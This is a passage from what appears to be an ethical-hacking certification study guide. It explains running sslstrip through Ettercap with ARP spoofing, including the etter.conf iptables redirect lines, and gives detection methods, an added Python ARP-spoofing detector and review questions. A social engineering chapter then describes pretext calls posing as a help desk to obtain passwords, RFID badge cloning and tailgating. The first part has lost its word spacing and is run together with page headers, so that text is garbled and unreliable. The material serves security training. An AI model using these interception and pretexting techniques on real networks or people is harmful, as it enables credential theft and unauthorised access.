P-­basedresponsecomesback.Asystemmaysendoutmultiplerequests,sincetheyareUDP,andthereisnoguaranteetherequestwillgettotheSpoofingAttacks 397DNSserver.Thefirstresponsethatisreceivedbytherequestingsystemwillbeused.SincetheEttercapsystemisonthelocalnetworkandthereisagoodchancetheDNSserverisnot,theDNSresponsefromtheEttercapsystemshouldbethefirstoneback.Anysubsequentresponsestotherequestingsystemwillbeignored.Bythatpoint,theaddressconfiguredinetter.dnshasbeensentbacktotherequestingsystemandpopulatedtheDNScacheonthatsystem.sslstripEncryptedmessagesareproblematicwhenitcomestocapturingtraffic.Encryptionisintendedtobeendtoend,meaningthereisnowaytositinthemiddle.Anymechanismtositinthemiddledefeatstheend-­to-­endexpectationofmostencryptionschemes.Havingsaidthat,itisinournatureasethicalhackerstotrytoviolaterulesandbreakthings.Therearewaystotrytobreakencryptedprotocols.Ofcourse,thiswasmucheasierwhenSSLwasbeingused.SSLhadmultiplevulnerabilitiesoverthedifferentversionspriortoTLS.EvenwhenTLSwasbroughtintoreplaceSSLbecauseofSSL’svulnerabilities,theearlyversionsofTLShadvulnerabilitiesthatmadeitsusceptibletohavingtheencryptioncracked.TheprogramsslstripwasdevelopedtograbSSLmessagesandstriptheencryptionfromthem.ThisprogramwasdevelopedbyMoxieMarlinspikeinconjunctionwithapresentationhemadeatBlackHatin2009.ThatwasinthedayswhenSSLwasstillprevalent,sotherewasagoodchanceitwouldwork.Today,thereislessofalikelihoodofsuccessbecause,ideally,systemadministratorsontopoftheirgamehaveremovedolderencryptionmechanismslikeSSLandTLS1.0and1.1.IfaserveronlysupportsTLS1.2andabove,SSLstripwon’tworkbecausethevulnerabilitiesthatallowedittoworkhavebeenresolved.Youcouldusesslstripasastand-­aloneprogram.Essentially,sslstripactsasatransparentproxy,sittingbetweentheserverandclient.Indoingthat,itcanchangelinksfromHTTPStoHTTPinsomecases.Italsousesothertechniquestomakeitappearthattheconnectionisencryptedwhen,infact,itisn’t.Asastand-­alone,sslstripmakesuseofarpspoof,whichwelookedatearlier.However,itispossibletorunsslstrip
asaplug-­intoEttercap.JustaswedidwiththeDNSspoofing,sslstriprequiresthatwehaveanARPspoofinplace.WecandothiswithEttercap,justaswedidearlier.WewouldwanttospooftheInternetgatewayaswehavebefore.WealsoneedtosniffremoteconnectionswhenwesetuptheARPspoofingattack.sslstripisaplug-­intoEttercap,soitcanbeenabledjustastheDNSspoofingplug-­inwasenabled.ThisdoesrequireaconfigurationchangeinEttercapbeforeenablingtheplug-­in.sslstripneedstoknowwhatfirewallcommandisbeingusedso itcansetuparedirectinthefirewall.Thefollowinglinesarecommentedinthe/etc/ettercap/etter.conffile.Theyneedtobeuncommentedifyouareusingiptables,whichismorelikelythanipchains,whichistheotheroption.398 Chapter9  Sniffing■/etc/ettercap/etter.conf#ifyouuseiptables:redir_command_on="iptables-­tnat-­APREROUTING-­i%iface-­ptcp-­-­dport%port-­jREDIRECT-­-­to-­port%rport"redir_command_off="iptables-­tnat-­DPREROUTING-­i%iface-­ptcp-­-­dport%port-­jREDIRECT-­-­to-­port%rport"Oncethat’sdone,thesslstripplug-­incanbeenabled.Itwillruntheiptablescommandtostarttheredirectsotheplug-­incanreceivethemessages.HereyoucanseethelogthatshowsthestartofsslstripinsideEttercap.RunningsslstripinEttercapHost192.168.86.1addedtoTARGET1ARPpoisoningvictims:GROUP1:192.168.86.118:D6:C7:7D:F4:8AGROUP2:ANY(allthehostsinthelist)Activatingsslstripplugin...SSLStripplugin:bind443on59273SSLStripPluginversion1.1isstillunderexperimentalmode.Pleasereportsanyissuestothedevelopmentteam.DHCP:[192.168.86.1]ACK:0.0.0.0255.255.255.0GW192.168.86.1DNS192.168.86.1"lan"Oncetheiptablesruleisinplace,sslstripshouldbecapturinganyHTTPStraffic.Again,though,thisassumesthattheHTTPSconnectionisusingaversionofSSLorTLSthatisvulnerabletothestrippingattack.Ifitisn’t,youwon’tgetanytraffic.SpoofingDetectionNetworkoperatorsandsecurityprofessionalsneedtobeabletodetectspoofingattacks.Agoodspoofingattackmaynotbedetectableattheuserlevel,whichmeansyouneedtobeabletodetecttheminthenetwork.Thismaycomefromusinganetworkintrusiondetectionsystem,butyoustillneedtoknowhowthosedetectionswouldwork.Fi
rst,let’sstartwithanARPspoofingattack.Asyousaw,anARPspoofingattackreliesontheattackersendingoutalotofARPresponses.Auserwon’tbeabletoseethishappening,butanymonitoringofthenetworkwouldshowupallofthesegratuitousARPmessagesonthenetwork.ThiswillgiveyouthefactthattheARPspoofingishappening.ItwillalsogiveyoutheMACaddressofthespoofer.Summary 399Knowingalayer2addressisn’tgoingtotellyouverymuch.Afterall,mostpeoplearen’tgoingtobeabletoeasilylookata6-­byteMACaddressandknowimmediatelywhatsystemitbelongsto.First,youcantakethefirstthreebytesandlookthemupbecausethefirstthreebytesareanorganizationallyuniqueidentifier(OUI).UsinganOUIlookuptool,suchastheoneavailableatwireshark.org,willgiveyouthemanufacturerofthenetworkcardtheMACaddressbelongsto.Asanexample,theMACaddressofasystemonmynetworkis70:4d:7b:6d:52:6a.PerforminganOUIlookuprevealsthatthemanufacturerisASUSTek.ThisisbecausethenetworkinterfaceisonamotherboardmanufacturedbyASUS.TheMACaddressaloneisn’tsufficient,especiallyifallthecomputersonyournetworkcomefromthesamemanufacturer.Allyouknowisthemanufacturerandalotofcompanieswillbuyalltheircomputersystemsfromasinglemanufacturerorevenacoupleofmanufacturers.YoumayneedtosearchyournetworkfortheMACaddress.YourswitcheswillalwayshaveamappingofMACaddresstoportnumber.OnceyouhavefoundwhichswitchtheMACaddressisconnectedto,youcanfindtheportandidentifywhatsystemtheportisconnectedto.Itcantakealittlechasing,especiallyiftheportdoesn’tdirectlyconnecttoasystembutinsteadanunmanagedport.Ataminimum,youcanchasethecablefromtheswitchportorthejacktheswitchportconnectsto.Youmayneedtoidentifyspoofingatthenetworklayer,meaningspoofingtheIPaddress.Thismaybeespeciallytrueinthecaseofdenial-­of-­serviceattacks.Thisshouldbehandledbyyourrouter.Yourrouter,ifit’sconfiguredtodoso,canperformsomethingcalledreversepathverification.Thisisslightlylessusefulifyouhaveonlyasingleconnectionpointonyourrouter.Reversepathverificationworksbyperformingalookupintheroutingtable.Theroutertakesthesourceaddressfromapacketandcheckstheroutingta
bletodeterminewhichinterfacearesponsepacketwouldgoouton.Iftheinterfacethemessagecomesinonisdifferent,thereisachancethepackethasbeenspoofed.DNSspoofingmaybehardertodetect,especiallyiftheattackerisusinganothermechanismtocapturetheoutboundDNSrequest.IftheIPaddressoftheoutboundmessagematchestheaddressontheinboundmessage,youmaybesafe.Ifthetwoaddressesdon’tmatch,youmaybesafe.Yes,thatdoesn’tmakealotofsense.TheproblemwithDNSisyoumayendupgettingaresponsefromadifferentaddress,dependingonhowtheDNSserverisconfigured.AbetterapproachwithDNSistouselocalDNSserversandconfigurethoseDNSserverstouseTCPratherthanUDP.Thethree-­wayhandshakeofTCPwillprotectyoufromspoofing,oratleastdoamuchbetterjobofprotectingyouagainstspoofingthanUDPdoes.YoucanalsomakesureyourlocalDNSserversareconfiguredtouseDNSSecurityExtensions(DNSSEC).Thiswillusecryptographicverificationofserversyouarecommunicatingwith.SummarySniffingcanbeanimportantskilltohavebecauseofthemanytacticsthatcanrelyoninformationthatcanbegatheredfromsniffing.Sniffingisanotherwordforcapturingpackets,whichistheprocessofgatheringallmessagesthatpassbythenetworkinterface,400 Chapter9  Sniffing■grabbingthemattheDataLinklayer,andpassingallthemessagesuptoanapplicationthatiscapableofdisplayingthemessagescaptured.Whileit’scalledpacketcapturing,it’sreallyframesthatarebeinggrabbedsincethedataisbeinggrabbedattheDataLinklayerwiththelayer2headersintact.Theprotocoldataunit(PDU)atlayer2isaframe.ThePDUatlayer3isapacket.Ifthepacket-­capturesoftwareisdiscardingthelayer2 
information, then it really is a packet capture. There is a lot of software that can be used to capture packets across varied platforms. The program tcpdump has been around since the late 1980s and was standardized in the late 1990s. It is generally available across multiple operating systems, but especially Unix-like operating systems. On Windows, you can get a port of tcpdump called windump. The behavior is the same, but the source code is different in order to take into account the way Windows interacts with its network hardware. If you are looking for a program you can use with the same name across multiple platforms, you can use tshark. This is a command-line program that comes with the Wireshark package. It also has the advantage of giving you the capability of printing only the fields you indicate. Wireshark is a GUI-based program that can perform not only packet capture but also packet analysis.

There may be other programs and utilities you can use to analyze packet captures, but Wireshark has to be about the best you can get, especially for the money. It's freely available and packed with functionality. Wireshark knows about dozens if not hundreds of protocols. It does protocol decoding and can identify issues with protocols. It will call attention to those issues by coloring the frames in the packet capture and also coloring the lines in the protocol decode. Wireshark will provide expert information that you can look at all at once from the Analyze menu. There is also a Statistics menu that provides a number of different ways to look at the data. This includes a protocol hierarchy, showing how the protocols break down in the packet capture. You can also look at the packet capture from the perspective of endpoints. In the different statistics views, you can see packet and byte counts.

It can be challenging to get packets to the device where you are trying to capture them. One way to do this is to mirror ports on a switch. This is sometimes called port spanning because, as mentioned previously, Cisco calls the functionality SPAN. You may not have access to the switch, though. You can also perform spoofing attacks, such as ARP spoofing. ARP spoofing is when a system sends gratuitous ARP responses, which are then cached on other systems on the network. ARP spoofing can be used to get packets to your system for capture. However, you can also use ARP spoofing as a starting point to do DNS spoofing if what you really want to do is redirect requests to other IP addresses. You can also use ARP spoofing to redirect web requests to the sslstrip plug-in. The program that does all this is Ettercap, though there are other programs that can do ARP spoofing.

DNS spoofing is also a possible way to redirect traffic to an attacker. This may be done by intercepting DNS requests and responding to them faster than the legitimate DNS server. In the case of DNS, first to answer wins, and sometimes DNS clients will accept answers even from IP addresses that the request was not sent to, because DNS servers may sometimes respond from a different IP address than the one the request was sent to.

Summary
Spoofing detection can be time-consuming. You may need to chase MAC addresses back through switch ports in order to find the system that owns that MAC address. When it comes to identifying spoofed IP addresses, you could use reverse path verification to check the routing table for the correct interface a message should come in on. This is more effective in larger networks where routers have multiple interfaces. In some cases, it's better to protect the network communication against spoofing attacks. This may be the case for spoofing attacks on DNS, for instance. Using local DNS servers, TCP, and DNSSEC can help protect DNS communications.
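As an added example that is not part of the book, the following Python script applies the detection approach the summary describes to tcpdump-style ARP lines: it tracks the IP-to-MAC bindings learned from replies and flags a reply that arrives with no outstanding request for that address (a gratuitous reply) or that contradicts a binding already learned. The trace lines, addresses and MACs are constructed samples modeled on tcpdump's ARP output, not captured traffic.

```python
"""Flag ARP spoofing indicators in a tcpdump-style ARP trace.

Added example, not from the book. It implements two checks the chapter
summary describes: a reply with no outstanding request for that IP
(a gratuitous, unsolicited reply) and a reply that contradicts the MAC
address already learned for an IP. Input lines are constructed samples
modeled on tcpdump's ARP output, not captured traffic.
"""
import re
from collections import defaultdict

# tcpdump prints ARP requests as "Request who-has <ip> tell <ip>"
# and replies as "Reply <ip> is-at <mac>".
REQUEST_RE = re.compile(r"ARP, Request who-has (\S+) tell (\S+)")
REPLY_RE = re.compile(r"ARP, Reply (\S+) is-at ([0-9a-fA-F:]{17})")


class ArpMonitor:
    """Track IP-to-MAC bindings and alert on spoofing indicators."""

    def __init__(self):
        self.bindings = {}                # ip -> first MAC learned for it
        self.pending = defaultdict(int)   # ip -> outstanding requests
        self.alerts = []                  # tuples describing each finding

    def observe(self, line):
        """Consume one trace line; return the alerts it raised (if any)."""
        raised = []
        m = REQUEST_RE.search(line)
        if m:
            self.pending[m.group(1)] += 1
            return raised
        m = REPLY_RE.search(line)
        if not m:
            return raised                 # not an ARP line we understand
        ip, mac = m.group(1), m.group(2).lower()

        # A reply nobody asked for is the gratuitous ARP the chapter
        # describes. Hosts also send these legitimately (boot, failover),
        # so this is a triage signal rather than proof of an attack.
        if self.pending[ip] > 0:
            self.pending[ip] -= 1
        else:
            raised.append(("unsolicited_reply", ip, mac))

        # The stronger signal: an IP we already know now claims a new MAC.
        # The first-seen binding is kept so every conflicting reply is flagged.
        known = self.bindings.get(ip)
        if known is None:
            self.bindings[ip] = mac
        elif known != mac:
            raised.append(("binding_changed", ip, known, mac))

        self.alerts.extend(raised)
        return raised


def analyze(lines):
    """Run the monitor over a trace; return (alerts, learned bindings)."""
    monitor = ArpMonitor()
    for line in lines:
        monitor.observe(line)
    return monitor.alerts, monitor.bindings


# Constructed sample trace: a normal exchange for the gateway, a later
# unsolicited reply claiming the gateway with a different MAC, and a host
# announcing itself before anyone asked for it.
SAMPLE_LINES = [
    "10:00:00.100000 ARP, Request who-has 192.168.86.1 tell 192.168.86.26, length 28",
    "10:00:00.101000 ARP, Reply 192.168.86.1 is-at 00:11:22:aa:bb:01, length 28",
    "10:00:05.000000 ARP, Reply 192.168.86.1 is-at de:ad:be:ef:00:01, length 28",
    "10:00:05.500000 ARP, Reply 192.168.86.40 is-at 00:11:22:aa:bb:40, length 28",
    "10:00:06.000000 ARP, Request who-has 192.168.86.40 tell 192.168.86.26, length 28",
    "10:00:06.001000 ARP, Reply 192.168.86.40 is-at 00:11:22:aa:bb:40, length 28",
]

if __name__ == "__main__":
    found, table = analyze(SAMPLE_LINES)
    for alert in found:
        print(alert)
```

On a real network the same logic can be fed from `tcpdump -n arp` output; the binding-change alert is the one worth chasing back through switch ports as the summary describes.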
Review Questions
You can find the answers in the appendix.

1. Which hardware vendor uses the term SPAN on switches?
A. HP
B. 3COM
C. Cisco
D. Juniper

2. If you saw the following command line, what would you be capturing?
tcpdump -i eth2 host 192.168.10.5
A. Traffic just from 192.168.10.5
B. Traffic to and from 192.168.10.5
C. Traffic just to 192.168.10.5
D. All traffic other than from 192.168.86.5

3. In the following packet, what port is the source port?
20:45:55.272087 IP yazpistachio.lan.62882 > loft.lan.afs3-fileserver: Flags [P.], seq 915235445:915235528, ack 3437317287, win 2048, options [nop,nop,TS val 1310611430 ecr 1794010423], length 83
A. lan
B. fileserver
C. yazpistachio
D. 62882

4. What is one downside to running a default tcpdump without any parameters?
A. DNS requests
B. Not enough information
C. Sequence numbers don't show
D. tcpdump not running without additional parameters

5. At which protocol layer does the Berkeley Packet Filter operate?
A. Internetwork
B. Transport
C. Data Link
D. Protocol

6. What do we call an ARP response without a corresponding ARP request?
A. Is-at response
B. Who-has ARP
C. Gratuitous ARP
D. IP response

7. Which functionality in Wireshark will provide you with percentages for every protocol in the packet capture, ordered by protocol layers?
A. Conversations
B. Endpoints
C. Protocol hierarchy
D. Statistics view

8. Which program would you use if you wanted to only print specific fields from the captured packet?
A. fielddump
B. tcpdump
C. wiredump
D. tshark

9. The following shows a timestamp. What does the time of this message reflect?
630 41.897644 NOTIFY * HTTP/1.1 192.168.86.210 239.255.255.250 SSDP [ETHERNET FRAME CHECK SEQUENCE INCORRECT] 750
A. The time since 1970.
B. The time of day.
C. The time since packet start.
D. There is no time in the summary.

10. What protocol is being used in the frame listed in this summary?
719 42.691135 157.240.19.26 192.168.86.26 TCP 1464 → 61618 [ACK] Seq=4361 Ack=1276 Win=31232 Len=1398 TSval=3725556941 TSecr=1266252437 [TCP segment of a reassembled PDU]
A. TLS
B. UDP
C. IP
D. TCP

11. What program could be used to perform spoofing attacks and also supports plug-ins?
A. arpspoof
B. fragroute
C. Ettercap
D. sslstrip

12. What would you need to do before you could perform a DNS spoof attack?
A. Set up a port span
B. Start up Wireshark
C. ARP spoof
D. Configure sslstrip

13. Which command-line parameter would you use to disable name resolutions in tcpdump?
A. -n
B. -i
C. -r
D. -x

14. Why might you have more endpoints shown at layer 4 than at layer 2?
A. Layer 4 multiplexes layer 2.
B. Systems may initiate multiple connections to the same host.
C. Ports are more numerous than MAC addresses.
D. The IP addresses dictate the endpoints.

15. What would you use sslstrip for?
A. Getting plaintext traffic
B. Removing all SSL requests
C. Converting SSL to TLS
D. Converting TLS to SSL

16. Why might you have problems with sslstrip?
A. sslstrip is deprecated.
B. sslstrip doesn't work with newer versions of TLS.
C. sslstrip doesn't support TLS.
D. sslstrip works only with Ettercap.

17. What does the following line mean?
Sequence number: 4361 (relative sequence number)
A. The sequence number shown is not the real sequence number.
B. The sequence number shown has not been incremented.
C. The sequence number shown isn't long enough.
D. The sequence number shown is the acknowledgment number.

18. What can you say about [TCP Segment Len: 35], as provided by Wireshark?
A. The window size has changed.
B. Wireshark has inferred this information.
C. Wireshark extracted this from one of the headers.
D. Wireshark has additional detail below.

19. What problem does port spanning overcome?
A. Switches don't support layer 3.
B. Switches aggregate ports.
C. Switches filter traffic.
D. Switches are unreliable.

20. What is the /etc/ettercap/etter.dns file used for?
A. Enabling firewall rules for Ettercap
B. Configuring hostnames to IP addresses
C. Setting up mail for Ettercap
D. Disabling ARP spoofing in Ettercap

Chapter 10
Social Engineering

THE FOLLOWING CEH EXAM TOPICS ARE COVERED IN THIS CHAPTER:
✓ Social engineering
✓ Physical security
✓ Verification procedures
✓ Biometrics

At the time this is being written, about 80 percent of attacks are thought to involve social engineering of some sort. This makes learning about social engineering significant. If the attackers are using it, you should be using it too. Ultimately, social engineering attacks are going to be very effective avenues into a network so you can continue to perform testing. This would be especially true when it comes to red teaming, where you are likely to have the cuffs taken off, as it were, and you have more latitude in your tactics.

You may be familiar with some basic social engineering strategies like phishing, simply because it's so common. Social engineering isn't just about sending emails, though. There are other social engineering strategies. Ultimately, any means of manipulating someone to do something they shouldn't or wouldn't otherwise do is social engineering. Social engineering brings in a lot of psychology and elements of human nature, so essentially you are using the way people are against them.

Beyond the basics of social engineering, including how and why it works, there is also social engineering outside the virtual world. A skilled social engineer can get a lot of people to do what the engineer wants them to do. In the digital space, there is phishing, of course, but even phishing can make use of other elements, including rogue websites. Rogue websites may be used even without the phishing component, and they are called rogue because either they are controlled by an attacker or there may be malware installed by an attacker within a legitimate website. Speaking of rogue, an attacker may create a rogue wireless access point. This would be done to lure people to connect to what they believe is a trusted wireless network. Creating rogue networks, as well as other aspects of social engineering, can be automated to take the time out of setting them up. We'll cover all of this over the course of this chapter.

Social Engineering
Social engineering, regardless of what it was called or how it was thought of, has been around probably as long as humans have been around. You may call it manipulation if you like, but in the information security community, it's called social engineering. The objective is to convince or manipulate someone into doing something they wouldn't normally do for someone they don't know. There are a number of techniques for doing that. They are generally considered to be related to the science of influence. Robert Cialdini proposed six principles as part of his theory of influence. They are as follows, and understanding these principles may help you start to understand how to influence or manipulate people:

Reciprocity
People will generally feel like they want to or maybe are obligated to respond to a kindness or favor. You may feel this way if a company gives away free samples. If you get one of these free samples, you may be inclined to feel like you should buy the product in response.

Commitment
If someone commits to something, either in writing or orally, they are more inclined to follow through on that commitment.

Social Proof
Think about social proof as peer influence. If you see someone else doing something, such as using a product, you will see that it is acceptable to do that. You may therefore be more willing to try the product, or whatever it is you've seen.

Authority
If you've ever been pulled over by the police, you can recognize this one. Even if you haven't, you may think back to being at school. In general, people are inclined to follow authority figures and do what they say or ask.

Liking
If you like someone, you may be more easily swayed by what they think or do.

Scarcity
This is easy to recognize. Think about Cabbage Patch Kids, if you go back that far, and also many of the product rollouts by Apple. The lack of availability of these products increases their perceived value. The perception of increased value makes them more desirable.

Many of these go back to the early origins of humanity. Think about social proof as an example. If you were to see your neighbor eating something and then not dying, you would be more inclined to eat that thing yourself. You have proof that it's safe. Similarly, humans have long relied on one another to survive. If your neighbor does something for you, you would do something for them because that is how communities work. Essentially, these are deep-seated modes of behaving because of the way our brains and neurochemistry work. We are wired to be susceptible to social engineering and scams because from an evolutionary standpoint we needed one another to survive, so trust is important.

Often the primary objective of social engineering is information. This means the attacker is trying to get someone to provide information they shouldn't be providing. It may be something like a username and password. It may be other personal information, like a Social Security number or a credit card number. Certainly, information is not the only reason to use social engineering. You may want to get someone to visit a website, where you have another attack waiting. You could also get someone to open an email. Think about the ILoveYou virus. A virus requires user intervention to spread from system to system. ILoveYou made use of a vulnerability in an email client, allowing the virus to use the address book to send messages to all the contacts. Before the virus could run, though, someone had to be convinced to open the email and then run the script that was contained in the message. The subject line, as you can see in Figure 10.1, was ILOVEYOU. Imagine getting an email from someone you know with that subject line. You're probably going to open the message. The message directs you to open the attached "text" file. In fact, this is another aspect of social engineering. Windows systems hide filename extensions for known file types. What you see in the message is LOVE-LETTER-FOR-YOU.txt, when in fact the actual filename extension is .vbs. It's just hidden so you think it's a text file.

FIGURE 10.1 ILoveYou virus

There are so many examples of social engineering, and you probably see many on a regular basis. When it comes to social engineering, though, it's probably best to be prepared and think about your situation and not expect to just fly by the seat of your pants.

Pretexting
A pretext is an excuse to do something or say something, and in the context of social engineering, a pretext is the story you have generated to explain the contact. The use of a pretext to perform social engineering attacks is called pretexting. This is essentially the script you will be following. It's where you would be spending a fair amount of time, so you need to have a clear understanding of how best to get what you are looking for. You start with what it is you are looking to get from your victims since that will be the basis of your story. For instance, if you are looking for someone's corporate credentials, you wouldn't call them saying you were from their bank. The story really needs to fit the circumstance.

Once you have an understanding of what it is you are looking for, you can start to create your scenario. You should think about how to "hook" the person so they are inclined to engage with you. While this was supposedly a legitimate contact, here's an example of a way to get someone to engage. How effective it might be is debatable. Recently, I received a phone call from someone asking for Aaron. When I said he had a wrong number, he said he didn't but that I could help. Though I hung up at that point, it's likely it was a call to ask for donations to some charity like the Police Officers Foundation, as the approach is similar to ones I've received from them. This also demonstrates the importance of your story and script. Rather than stumbling when I said there was no one here by that name, he had an answer without hesitation. These sorts of calls, by the way, bring in the concept of commitment. They cold-call and then keep after you until you say you will commit to giving them money. They know that if they just send you something in the mail so you can think about it, you won't follow through. If you have told them you will follow through by giving money to their cause, you will likely follow through.

Keep in mind the principles of social engineering as you are developing your story. If you are trying to get someone to give up their information, doing them a favor or at least appearing to do them a favor can make them feel indebted to you. You may call, for instance, saying you are from the company's help desk and you noticed a lot of bogus attempts to log in to your target's account. You were concerned about them and their personal information since credit card theft is so prevalent, not to mention any other data that may be stored on their system. They will be grateful for the favor you did them, appearing to protect their interests. Then, you can offer to get their password confirmed or even changed. If you make them a little afraid, you may be able to also short-circuit any natural suspicion. If you are looking for some good stories about how to work a social engineering attack, find some of the stories by Kevin Mitnick, who has long been considered a master of social engineering.

You will likely have at least heard of people getting phone calls from the IRS or from the police. You are going to be arrested if you don't call back immediately and come to an arrangement. This is using the perception of authority against you. You're expected to follow the directions of the authority. If you've ever received one of these phone calls, note the tone of voice used. It's very serious and authoritative. The story about you being arrested unless you arrange a payment to cover costs or fines or whatever they use as their pretext is completely bogus. However, they are looking to appeal to your tendency to follow authority.

Similarly, when you receive email from FedEx or American Express or Chase or any other legitimate company, the email isn't just plain text. It's complete with the real logo. It also probably uses the same font you might expect if you were to get email from those companies. It looks legitimate, or authoritative. Because it looks correct and because they are likely offering up something you want, they expect you will ignore the actual URL (since it's hidden by the email client anyway, as a general rule) and click the link. At that point, you will be taken to a rogue website.

FYI
A once common social engineering attack was a 419 scam. This is also referred to as the Nigerian Prince scam, and the 419 refers to the section of the Nigerian criminal code. This scam is similar to a scam from the 18th century, which is a reminder of how long social engineering has been used to manipulate people for criminal purposes. The 419 scam asks for an advance fee with the promise of enormous riches on the back end. Obviously, once the confidence artist gets the advance fee from the victim, they move on.

There are many ways to get someone to believe your story and also many potential outcomes from a social engineering attack. The important thing, if you want to be successful, is to get your pretexting done so you have your story together. This will allow you to be able to handle any situation that may arise if you are actually talking to someone. It will also help you to get all the artifacts correct if you are using a digital attack.

Social Engineering Vectors
Once you start factoring in all the different pretexts you could use, there are countless ways to get to someone and whatever you are looking to get from them. However, when it comes down to it, there are really four vectors that are used for social engineering. They are as follows:

Phishing
The word phishing is based on the idea of fishing, meaning you are dangling some sort of bait out to get information. Decades ago, the term phreak was used to talk about someone who was proficient at manipulating the phone network. By extension, the word fishing was mangled to create the expression phishing. Phishing is a technique used to acquire information through deception using electronic communications. You might expect to see phishing attempts through email or instant messaging. You could also see it used through social networking platforms.

Vishing
Voice phishing, or vishing, is a common approach. This is using phone calls to phish for information. A vishing attack could also be used for reconnaissance. You might use vishing to acquire information about your target.

Smishing
This is phishing with short message service (SMS) messages. You may receive text messages from numbers you don't know, perhaps with a link in the message. In the age of smartphones, it's easy for a target to touch the link and be taken to the website.

Impersonation
This is a common approach and one we've certainly discussed earlier. In this case, it's considered to be more of a physical vector, where you are trying to gain access to a building or facility by pretending to be someone else. Impersonation is ultimately a major component of many of the social engineering attacks. Impersonation attacks can also be through websites in that users believe they are visiting one site when in fact they are visiting another.

These are just a handful of attack vectors. Most of them are based on means of communication, but one of them is based on a primarily physical mechanism: pretending to be someone or something you aren't.
Physical Social Engineering
Not all information is digital. Not all targets exist in the digital realm. In reality, the easiest path into an organization is going to be through people. That continues to be shown through any number of attacks over years, if not decades. Sometimes, the best way to get through people is to engage them physically. This could be through the use of voice, as in a vishing attack. It could simply be showing up somewhere and trying to gain entrance to a facility. You can perform a lot of reconnaissance using a physical vector. Gaining access to a facility means you could see people's desktops or whiteboards. A lot of users can be prone to writing down information they believe is important. This, yes, sometimes includes passwords. In cases where password policies are onerous, they don't take into account how hard remembering passwords can be, and some users will simply be incapable of keeping track of their passwords and resort to writing them down to remind them.

Physical access is also the best kind of access when it comes to computer systems. If you can get to a system, you may find it unlocked. It's also possible to boot off removable media to grab passwords or change them. This is not to say that getting access to a facility will be easy. There are a number of security measures that are likely to be in place to prevent that.

Badge Access
Badge access is a common approach to restricting access to those who are authorized. What it means is employees and others who have been authorized are provided with a badge. You can see an example of a badge in Figure 10.2. The badge will generally have a radio frequency identification (RFID) device that can be read by badge readers. The reader is connected to a system that can check whether your RFID device, and by extension you, has been authorized. If your card has been authorized, the reader sends a signal to unlock or release the door, a fairly simple process that is widely used.

FIGURE 10.2 RFID-based badge
There are problems with this approach, though, meaning you can bypass these door-locking devices to allow you to gain access to a building. First, there is tailgating, also called piggybacking. If you wait around an entry door, especially about the time employees would commonly be going into the building, you could wait until someone else ran their badge and unlocked the door. You would then just follow them into the building. This doesn't mean you would have unrestricted access to everywhere. Many facilities will place badge readers on inside doors in addition to the outside doors. If they are allowing multiple people through the outside door, though, there is a good chance you could still just use the tailgate option again to whatever part of the building you needed to get access to.

Employees are often educated about badge access and tailgating. However, you will find employees who are reluctant to challenge someone else to see if they have a badge. Ideally that's the procedure when someone tries to tailgate, though it doesn't often happen in my experience. Some companies may suggest you allow the tailgating and then call physical security to deal with it, under the premise that if someone is trying to gain access to the building for malicious purposes, they may put the employee's physical safety in danger if the employee challenges their access.

Another approach to badge access is to clone an RFID card. The RFID tag is just a very small device that can respond to a query from another device. There are different combinations of active and passive interaction between the tag and the reader, but ultimately, they work on radio frequency waves operating in the 125 kHz or 13.5 MHz range. To clone one, all you need to do is read the identifier off the badge or device you want to clone and replicate it into the new badge, card, or other device you are using. It also may be possible to clone a device using the near-field communication (NFC) technology in your phone. In fact, some hotels are starting to make use of that technology to allow you to use your phone to unlock doors.

While this isn't necessarily a very expensive endeavor, it may be easier to simply get your hands on someone's card to make use of it for a while. One advantage to this is that even though photos are generally on these badges, though not always, most people won't notice a photo, nor will they ask to see the badge close enough to look at it. It's also easy to walk around with the badge turned around so there is no name or photo showing. This happens regularly with the belt clips that have reels to hold the badge. Just by the nature of the device, it's easy for the badge to spin so it is backward.

Not all companies put much in the way of identification on their badges. It's common to not put the name of the company. There may not even be the employee's name. Sometimes you may find there isn't a photo, making use of the badge significantly easier. A company I did consulting for several years ago gave out contractor badges. These badges had a large C on them where the photo would normally go. Obviously, with no name and no photo, how would anyone challenge the use of this particular badge, as long as it granted access to the building?
Sometimes, you will find there is a guard inside the badge access doors. The guard should be checking for tailgating and also, ideally, visually inspecting entrants to see that they have their badges. People are people, however, and it can be easy to slip through a group of people unless the guard is forcing individual inspection of the badge. You just walk through as though you belong there and assume the guard won't notice your lack of badge. There may be other ways to get around badge access, though those are common ones. You won't always have it easy, though, when it comes to getting in with a badge. Not all companies just allow the doors to swing open and stay open for a period of time.

Man Traps
A man trap is a device that will make it considerably harder to gain entrance to a building. Additionally, it will make it much more dangerous for you. If there is a man trap, you will run across two doors separated by a short space. Once you gain entry through the first door, you are trapped in that space until the second door is opened. The second door would likely be operated by a guard who may perform some sort of authentication check like verifying your identity against the name and photo on the badge that may have allowed you into the space to begin with. It becomes much harder to get through than just plain old badge access. This may be an area where badge cloning may be of some help, unless the guard is checking your badge against another form of identification.

There are other ways of doing something similar: only allowing a single person through a doorway at one time. You may find cases where there is a turnstile or revolving door that restricts access based on badge access or another form of authentication. Turnstiles can be hopped, but a fully enclosed revolving door is something else altogether. This is a place where you won't be able to tailgate. Only one person is allowed into the revolving door at a time. There is commonly a combination of mechanisms in a door like this. The first is the badge access. You would be required to swipe your badge on the reader. Once you did that, you would need to step into the door mechanism. Once it registered that you were there, it would allow for a partial revolution, just enough to allow someone through.

One way of getting around this is making use of someone else's badge before they use it. Since you may mistime stepping into the door, you may need to swipe your badge multiple times, which means that a double swipe is common enough that it's allowed. If you happened to have an accomplice within the company, they could swipe you in and then swipe themselves in as soon as the door had discharged you. You probably won't have someone on the inside to let you in, though, which means finding another way around. This is where disability laws come in. Obviously, a door so restrictive as to not allow more than one person in at a time (and often barely admits a person with a backpack on) wouldn't allow someone on crutches and certainly not someone in a wheelchair. So, you may find there is a handicapped door allowing badge access to the building. A company I used to work at had the two side by side. It was easy to swipe in using the handicapped door, and it would stay open for a good amount of time before auto-closing, to ensure that anyone disabled in some way had time to get through. Honestly, we used the handicap entrance to get to our cars in the parking garage when we went to lunch with vendors so they didn't have to go back through the lobby. We just used this door and they tailgated.

Interestingly, these revolving doors can operate as a sort of man trap in the sense that even if you were to gain access in some way to the building without having a badge, you would be stuck in the building because in order to get out, you'd need to swipe your badge again to operate the door. The same process would happen on the way out. You would swipe, then step on the pad, and the door would rotate just a quarter turn, enough to let you out on the other side.

Biometrics
